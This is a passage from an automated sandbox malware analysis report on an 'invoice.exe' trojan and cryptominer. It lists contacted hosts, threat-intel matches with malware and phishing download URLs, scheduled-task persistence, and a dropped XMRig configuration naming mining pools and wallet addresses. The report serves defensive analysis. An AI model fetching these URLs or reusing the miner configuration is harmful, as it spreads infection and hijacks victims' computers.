                      http://tempuri.org/Entity/Id18ResponseRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Entity/Id12LRRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/XRegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Entity/Id3ResponseRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.githubassets.com/assets/primer-ff8ec1db4f06.cssAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.githubassets.com/assets/vendors-node_modules_github_hotkey_dist_index_js-node_modulesAppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://resources.github.comAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceRegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/soap/actor/nextRegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-55a9038bAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_jAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Entity/Id20LRRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-85AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.com/customer-storiesAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.com/readmeAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                      172.67.19.24 | pastebin.com | United States | US | 13335 | CLOUDFLARENET | true
                      140.82.121.3 | github.com | United States | US | 36459 | GITHUB | false
                      135.181.7.171 | unknown | Germany | DE | 24940 | HETZNER-AS | true
                      Joe Sandbox version: 40.0.0 Tourmaline
                      Analysis ID: 1504580
                      Start date and time: 2024-09-05 01:44:42 +02:00
                      Joe Sandbox product: CloudBasic
                      Overall analysis duration: 0h 4m 48s
                      Hypervisor based Inspection enabled: false
                      Report type: full
                      Cookbook file name: default.jbs
                      Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of new started processes analysed: 31
                      Number of new started drivers analysed: 0
                      Number of existing processes analysed: 0
                      Number of existing drivers analysed: 0
                      Number of injected processes analysed: 0
                      Technologies:
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode: default
                      Analysis stop reason: Timeout
                      Sample name: invoice.exe
                      Detection: MAL
                      Classification: mal100.troj.evad.mine.winEXE@38/23@2/3
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Excluded processes from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 52.168.117.173, 20.189.173.20
                      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes were analyzed; the report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information
                      • Report size getting too big: too many NtCreateKey calls found
                      • Report size getting too big: too many NtOpenKeyEx calls found
                      • Report size getting too big: too many NtProtectVirtualMemory calls found
                      • Report size getting too big: too many NtQueryValueKey calls found
                      • Report size getting too big: too many NtReadVirtualMemory calls found
                      • Some HTTPS proxied raw data packets have been limited to 10 per session; view the PCAPs for the complete data
                      • VT rate limit hit for: invoice.exe
                      Time | Type | Description
                      00:45:43 | Task Scheduler | Run new task: dllhost, path: C:\ProgramData\Dllhost\dllhost.exe
                      00:45:43 | Task Scheduler | Run new task: NvStrayService_bk9049, path: C:\ProgramData\Dllhost\dllhost.exe
                      19:45:31 | API Interceptor | 1x Sleep call for process invoice.exe modified
                      19:45:39 | API Interceptor | 20x Sleep call for process powershell.exe modified
                      19:45:42 | API Interceptor | 16x Sleep call for process AppLaunch.exe modified
                      19:45:48 | API Interceptor | 2x Sleep call for process WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.19.24 | sostener.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
172.67.19.24 | Invoice Payment N8977823.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
172.67.19.24 | Pending_Invoice_Bank_Details_XLSX.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
172.67.19.24 | Dadebehring PendingInvoiceBankDetails.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
172.67.19.24 | PendingInvoiceBankDetails.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
140.82.121.36 | glRBXzk6i.exe | malicious | RedLine | github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
140.82.121.36 | firefox.lnk | malicious | CobaltStrike | github.com/john-xor/temp/blob/main/index.html?raw=true
140.82.121.36 | 0XzeMRyE1e.exe | malicious | Amadey, Vidar | github.com/neiqops/ajajaj/raw/main/file_22613.exe
140.82.121.36 | MzRn1YNrbz.exe | malicious | Vidar | github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
140.82.121.36 | RfORrHIRNe.doc | malicious | Unknown | github.com/ssbb36/stv/raw/main/5.mp3
135.181.7.171 | file.exe | malicious | MinerDownloader, RedLine, Vidar, Xmrig |
135.181.7.171 | file.exe | malicious | MinerDownloader, RedLine, Xmrig |
135.181.7.171 | file.exe | malicious | MinerDownloader, RedLine, Xmrig |
135.181.7.171 | file.exe | malicious | MinerDownloader, RedLine, Xmrig |
135.181.7.171 | 7aqYJ5Mnxz.exe | malicious | MinerDownloader, RedLine, Xmrig |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
pastebin.com | FRENCH GROUP.js | malicious | Remcos | 172.67.19.24
pastebin.com | _PDF__838754.msi | malicious | Metamorfo | 104.20.3.235
pastebin.com | CDf7AZWbMo.exe | malicious | DCRat | 104.20.3.235
pastebin.com | French Group.js | malicious | Remcos | 104.20.4.235
pastebin.com | file.exe | malicious | RHADAMANTHYS, XWorm | 104.20.4.235
pastebin.com | French Group.js | malicious | Remcos | 104.20.4.235
pastebin.com | SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe | malicious | Unknown | 172.67.19.24
pastebin.com | SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe | malicious | Unknown | 104.20.3.235
pastebin.com | French Group.js | malicious | Remcos | 104.20.3.235
pastebin.com | Mi_Documento.js | malicious | AsyncRAT, DcRat | 104.20.3.235
github.com | https://d17vgkthg9sa6w.cloudfront.net/#Y8~zYXBvdGhAaGFycmlzd2lsbGlhbXMuY29t | malicious | HTMLPhisher | 140.82.121.3
github.com | Electronic_Receipt_ATT0001.htm | malicious | HTMLPhisher | 140.82.121.4
github.com | bad_site.html | malicious | HTMLPhisher | 140.82.114.4
github.com | https://lookerstudio.google.com/reporting/b3139b32-ff5a-40a9-b2b6-1f7e76569da2 | malicious | HTMLPhisher | 140.82.121.3
github.com | https://github.com/Azure/review-checklists/releases/latest/download/review_checklist.xlsm | malicious | Unknown | 140.82.121.5
github.com | xde1wui2zjw.exe | malicious | AsyncRAT, PureLog Stealer, XWorm | 140.82.121.4
github.com | malicious.html | malicious | HTMLPhisher | 140.82.121.4
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HETZNER-ASDE | SecuriteInfo.com.Script.SNH-gen.5224.29912.exe | malicious | FormBook | 178.63.50.103
HETZNER-ASDE | bot_library.exe | malicious | Unknown | 159.69.63.226
HETZNER-ASDE | bot_library.exe | malicious | Unknown | 159.69.63.226
HETZNER-ASDE | https://www.zdescargas.org/adobe-acrobat-pro-dc-2022-full-v15-12-2023/ | malicious | HTMLPhisher | 49.12.202.237
HETZNER-ASDE | https://3005380968002841328691457.triart-services.com/Hjdshdihsd/shdiboidow/sosuodb/owbowehe/jdbiubfiu/pwdfibfd/oJSHmU/a3l1ZW5AY3ZjLmNvbQ== | malicious | Unknown | 176.9.23.121
HETZNER-ASDE | 1sdc8Z0Wj1.exe | malicious | GuLoader | 148.251.143.76
HETZNER-ASDE | https://notes.cozytravelers.com | malicious | Unknown | 167.233.13.125
HETZNER-ASDE | bot_library.exe | malicious | Unknown | 159.69.63.226
HETZNER-ASDE | bot_library.exe | malicious | Unknown | 159.69.63.226
HETZNER-ASDE | file.exe | malicious | LummaC, Amadey, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine | 176.9.8.206
CLOUDFLARENETUS | https://email.dependent.best/maintenance.html?book=py.kim@hdel.co.kr | malicious | Unknown | 172.67.180.140
CLOUDFLARENETUS | https://www.pelisplus3.design/srdgvbbe | malicious | HTMLPhisher | 188.114.96.3
CLOUDFLARENETUS | https://docsend.com/view/s/g9wy7hdqt2mwawpc | malicious | Unknown | 172.66.0.227
CLOUDFLARENETUS | file.exe | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | RedEngine.exe | malicious | Babadeda, RedLine | 104.26.12.205
CLOUDFLARENETUS | RANGLANDLAW.xlsx | malicious | Unknown | 172.64.150.63
CLOUDFLARENETUS | nkVQ.exe | malicious | AgentTesla | 172.67.74.152
CLOUDFLARENETUS | http://warinice.ac.th/h/d/ | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | http://warinice.ac.th/h/d/paiement.php | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | http://mentmaskloegionn.gitbook.io/us/ | malicious | Unknown | 172.64.147.209
GITHUBUS | https://d17vgkthg9sa6w.cloudfront.net/#Y8~zYXBvdGhAaGFycmlzd2lsbGlhbXMuY29t | malicious | HTMLPhisher | 140.82.121.3
GITHUBUS | http://staticfile.org | malicious | Unknown | 140.82.114.22
GITHUBUS | Electronic_Receipt_ATT0001.htm | malicious | HTMLPhisher | 140.82.121.4
GITHUBUS | bad_site.html | malicious | HTMLPhisher | 140.82.114.4
GITHUBUS | https://lookerstudio.google.com/reporting/b3139b32-ff5a-40a9-b2b6-1f7e76569da2 | malicious | HTMLPhisher | 140.82.121.3
GITHUBUS | https://github.com/Azure/review-checklists/releases/latest/download/review_checklist.xlsm | malicious | Unknown | 140.82.121.5
GITHUBUS | xde1wui2zjw.exe | malicious | AsyncRAT, PureLog Stealer, XWorm | 140.82.121.4
GITHUBUS | https://smruti-ranjan-sahoo-tech.github.io/NetflixClone | malicious | HTMLPhisher | 140.82.112.17
GITHUBUS | malicious.html | malicious | HTMLPhisher | 140.82.121.4
GITHUBUS | https://demo.testfire.net/login.jsp | malicious | Unknown | 140.82.121.5
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | RedEngine.exe | malicious | Babadeda, RedLine | 172.67.19.24, 140.82.121.3
3b5074b1b5d032e5620f69f9f700ff0e | nkVQ.exe | malicious | AgentTesla | 172.67.19.24, 140.82.121.3
3b5074b1b5d032e5620f69f9f700ff0e | http://warinice.ac.th/h/d/paiement.php | malicious | Unknown | 172.67.19.24, 140.82.121.3
3b5074b1b5d032e5620f69f9f700ff0e | XClient.exe | malicious | XWorm | 172.67.19.24, 140.82.121.3
3b5074b1b5d032e5620f69f9f700ff0e | http://pub-ca22a10ffb7349aca30da700c49a0d87.r2.dev/index.html | malicious | Unknown | 172.67.19.24, 140.82.121.3
3b5074b1b5d032e5620f69f9f700ff0e | https://ecom.bio/88bmwbm?gad_source=1&gclid=Cj0KCQjwiuC2BhDSARIsALOVfBJ293HpuZvtJvhD8kPzmEW6CdE9kLYMBSVdTvNfgfsL__VlxT7t4s4aAiVuEALw_wcB | malicious | Unknown | 172.67.19.24, 140.82.121.3
3b5074b1b5d032e5620f69f9f700ff0e | http://pub-719c8fa48daf46c3b7652581c04f08c2.r2.dev/zzzzzzzzzzz01.html | malicious | HTMLPhisher | 172.67.19.24, 140.82.121.3
3b5074b1b5d032e5620f69f9f700ff0e | https://folgot-login.click/icloud2022-esp.php/isignesp.php/isignesp.php/ | malicious | Unknown | 172.67.19.24, 140.82.121.3
3b5074b1b5d032e5620f69f9f700ff0e | http://www.rb.gy/1vahpx/ | malicious | Unknown | 172.67.19.24, 140.82.121.3
3b5074b1b5d032e5620f69f9f700ff0e | https://claim-hadiah.3841.my.id/ | malicious | Unknown | 172.67.19.24, 140.82.121.3
                                No context
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):345
                                Entropy (8bit):5.7081731137089875
                                Encrypted:false
                                SSDEEP:6:DiYgE/ovRhBFqGTUhKliYgE/ovRhBFqGTUhKSI7wKd/cwEJPDdVsYQnKfaHTPOxR:uwgphTlMxwgphTlMA7cwo7LS9jqgq2Ah
                                MD5:0A686F03494576F1204E65653BCE54BF
                                SHA1:22FAA860EC67A432ED3B6829939B5F6353139BC4
                                SHA-256:E93E709DA2BF600012DF6FA6BEE9775C42C337501C485757F3A7BCA17C135D7D
                                SHA-512:EEA7C9A97657EF872D777504C1A5981437493C940B745EFAAE8D521877862398EDFB4FFD49D79D434AF5D12F2433DA605EA2959858CC1858B40098C768E66253
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\ProgramData\HostData\logs.uce, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\ProgramData\HostData\logs.uce, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\ProgramData\HostData\logs.uce, Author: Joe Security
Preview:
ETCHASH
etc.2miners.com:1010
0x3CDd8bD2585d5ad6C952De241E0E91D4C85d3Fe4
ETCHASH
etc.2miners.com:1010
0x3CDd8bD2585d5ad6C952De241E0E91D4C85d3Fe4
XMR
xmr-eu1.nanopool.org:14433
4ABgk8FGE9UaEq9uhKpc9sMMfHouAgzvXeLJy8MmydhZMM8bWoTDuDWGj5bboFKWMzTcTfhaVhQ1zLbvrKUR9kjvA69WX8K
S1lent_Hash
S1lent_Hash
cp
https://pastebin.com/raw/PTNbBX9V
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.7274206994445057
                                Encrypted:false
                                SSDEEP:96:kUFpT5US7sNhWoI7RT6tQXIDcQvc6QcEVcw3cE/FHsHE+HbHg/8BRTf3Oy1H3a9Q:lDD7d0BU/5UNjuGzuiF0+Z24IO8yzv
                                MD5:77C929C30939E3D7DDB8B4AC22D277E0
                                SHA1:7E6EF327384B0903B0E3DD5F272137393CCC09C5
                                SHA-256:80D81A84E7E4A6896157DC6E2A4A72C781A9291D3F1360159224F9253B3D396A
                                SHA-512:2BC57A8E06E4943F08C03D5A77BA06E9D31FDCEEA887A00EF8F0DED0BAA7244D786C9B38E727244AF04E4580B6BA8FE06DDC052A29AD058D6AE009A4156AE2B4
                                Malicious:false
Preview:
Version=1
EventType=BEX
EventTime=133699671333254984
ReportType=2
Consent=1
UploadTime=133699671339348757
ReportStatus=524384
ReportIdentifier=f6ecaf97-1fdd-4c93-8466-2db9d9ef8072
IntegratorReportIdentifier=c3f3f15b-3d49-46b9-8714-43517c231745
Wow64Host=34404
Wow64Guest=332
NsAppName=4usfliof.exe
AppSessionGuid=000011a8-0001-0014-23c8-228724ffda01
TargetAppId=W:00065ecb28895c216709a3139ada8e740e500000ffff!0000ade072fea73e4f76c073e17bb75dc2d13b275919!4usfliof.exe
TargetAppVer=2023/
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.7327043040042487
                                Encrypted:false
                                SSDEEP:192:2pIPABY0BU/5M1juGzuiF0+Z24IO86rJ:LABzBU/AjfzuiF0+Y4IO8Y
                                MD5:00F8BED9213F2DFF853F6C5CFCA60E23
                                SHA1:C96DBB062AE49EF27120B2F993452CF51FF8354E
                                SHA-256:F540741F4FA8F57CC8FA2B90CA5E8AB5F401DF43EFC7B877A770BA0A2122F57F
                                SHA-512:5FF657D5DE61370ABB84D28340BF21E1A6E31A9BE3448F5970AE5D482A1CEB249534251FBFC6451C52E67BDD83959BFE8AE4C6C865FE4EAABF4AA7A6740CBFE3
                                Malicious:false
Preview:
Version=1
EventType=BEX
EventTime=133699671358275593
ReportType=2
Consent=1
UploadTime=133699671366713095
ReportStatus=524384
ReportIdentifier=b755bcbb-81db-4dc2-9706-9ef5b4df1c83
IntegratorReportIdentifier=0c05105e-60ad-4971-9014-aa557aab4107
Wow64Host=34404
Wow64Guest=332
NsAppName=yee9mbi69cm7.exe
AppSessionGuid=00001670-0001-0014-098e-288724ffda01
TargetAppId=W:0006a1b034f13531f28d49e346c0ac1847150000ffff!00004df9ed4524474c5108453453dcfe837aa148b761!yee9mbi69cm7.exe
TargetAppV
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Wed Sep 4 23:45:33 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):43110
                                Entropy (8bit):1.6992816708496177
                                Encrypted:false
                                SSDEEP:192:GDbJcS3630xbOU5F1JVJ3+uMpvnwaDEiUHPH5IFH:UuSriU5LJT+V94iQHm
                                MD5:03D5EFA2327F0FEB4EE7C30FB354FE93
                                SHA1:C29D0B87674FA9868BB8E9DEEB888D15ACA3E398
                                SHA-256:638B33E8AAB8CF615F29E712EC76EFF4EBC81E89B57520C1917F0A852EAD6ABB
                                SHA-512:572437295B6A08E04394E164266C6EFA8ABE444EB3444C80E31BC69D753AD7730E56F14500B20B79E1E1064712C6F24593B20C3D6F12FBADECA56E74DA7F19F0
                                Malicious:false
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):6374
                                Entropy (8bit):3.7195141075979734
                                Encrypted:false
                                SSDEEP:96:RSIU6o7wVetbKI6rcYYrPlQE/ZJY5aM4U/89bDFsfKBm:R6l7wVeJKI6IYYxopr/89bDFsfKBm
                                MD5:501E63C84797D7440D80FCF820A6974B
                                SHA1:2D03E24AEC21DB45E423897921AA1F7AD39BF8A1
                                SHA-256:8206179F2B7B5BF61BA77B7BB6C5D1BE2B4CFBEEC8CF3FB636601997E7EA99A1
                                SHA-512:51F88B1EBA3CE5B6853586957809534E63828FB84FEBD5D599F2A4FC5796E5D2FFE718939CEE4A07EFEF860F824D4CDD53D3B05494ADD3E9EBAB3365091BE030
                                Malicious:false
Preview:
<?xml version="1.0" encoding="UTF-16"?>
<WERReportMetadata>
<OSVersionInformation>
<WindowsNTVersion>10.0</WindowsNTVersion>
<Build>19045</Build>
<Product>(0x30): Windows 10 Pro</Product>
<Edition>Professional</Edition>
<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
<Revision>2006</Revision>
<Flavor>Multiprocessor Free</Flavor>
<Architecture>X64</Architecture>
<LCID>2057</LCID>
</OSVersionInformation>
<ProcessInformation>
<Pid>4520</Pi
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4710
                                Entropy (8bit):4.469122256987712
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsJJg77aI9jgWpW8VYHfYm8M4JpHFA+q8vUmcXrhk5ydd:uIjfbI7VZ7VfJ4KforS5ydd
                                MD5:D03B860DA25A7AB8DE2FEBBE9A787A15
                                SHA1:21C7B5A3115294EB3FF588890FB26AE569F3D653
                                SHA-256:9BD3439E052FEDCEDF82D643B8F57F6E66BE2308339921568BBCD70D52BA25C0
                                SHA-512:A1A199D1219ECD0049164340A968E36C0DD30A5F3803C6A63003DA9D7240801D0E66594821D3C07CD4073F468DE754AFE09EB7638123F48B921EDD19046B04C3
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="486168" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Wed Sep 4 23:45:36 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):43506
                                Entropy (8bit):1.6752651557632254
                                Encrypted:false
                                SSDEEP:96:5u8DLt6f9XdScjnO7mVCmi7X9GVW4ywQJD/Rthcf3KRdGqb8yZf1aLWIkWIxlI5Q:HDw+QnOsOA8tE3KDGqbT6ynR6Q
                                MD5:55261C98F84AB9568B22C02C703EED4F
                                SHA1:BCCC9AEACC3C247C374C6B8698FAB0EA788B31D6
                                SHA-256:D091DDAD9AD80DDB85BB378B8666AE7D197B47F27876C7EEBA8082280BEB4034
                                SHA-512:69E43A7768C0185E552532BFE4570AB4209105D3FAD2A87E99E53C16AB1FBC8B160D70A545C6E79A4D0ECE80EA277843660E83ACB130772FCAFFD2BB16CC7307
                                Malicious:false
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):6400
                                Entropy (8bit):3.7216467473264574
                                Encrypted:false
                                SSDEEP:96:RSIU6o7wVetbTll6wZeYkPlQE/ZJY5aM4U/89be9sfzKm:R6l7wVeJTll6wZeYCopr/89be9sfzKm
                                MD5:047825DDF8528B57B5CEF9B05E719D1C
                                SHA1:FEF195FBD341E664E9A31050F8EC8EE2B9515BCD
                                SHA-256:5C17AF709B537BB4EDD779F644FA6A83A71F2AE2422A56DBD28575AAA6576A3D
                                SHA-512:C364E5662755DE27BF18CF6D50EF2C9BF9AA975FA2041F1A79E2E1A4431E811518C33F61C117F4CDD8831875646D630BA825BC7295664FD8776376926F8E0912
                                Malicious:false
Preview:
<?xml version="1.0" encoding="UTF-16"?>
<WERReportMetadata>
<OSVersionInformation>
<WindowsNTVersion>10.0</WindowsNTVersion>
<Build>19045</Build>
<Product>(0x30): Windows 10 Pro</Product>
<Edition>Professional</Edition>
<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
<Revision>2006</Revision>
<Flavor>Multiprocessor Free</Flavor>
<Architecture>X64</Architecture>
<LCID>2057</LCID>
</OSVersionInformation>
<ProcessInformation>
<Pid>5744</Pi
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4730
                                Entropy (8bit):4.469740454253518
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsJJg77aI9jgWpW8VYzoYm8M4JaDLHFz3+q8vVLsjojGsGLd:uIjfbI7VZ7VkFJaDB3KV4GGsGLd
                                MD5:E2E74B8661EE4CF5F0A99C7F6814C605
                                SHA1:9D6B0A575AD23986E0F732FE152CDE2B05F25115
                                SHA-256:F6ADD475152B79219B1B6A194704DBAA54A2538250B195B9D8CBAB9BA8D2C368
                                SHA-512:DFC4FB387659CC99BF58B35BD795ECAAF1F7367FF13AF18EB263627DA85355BF8B73EAC7879D648D9CF5257372DE83AC7AC6F0159303FBE319CE202F270F7A5B
                                Malicious:false
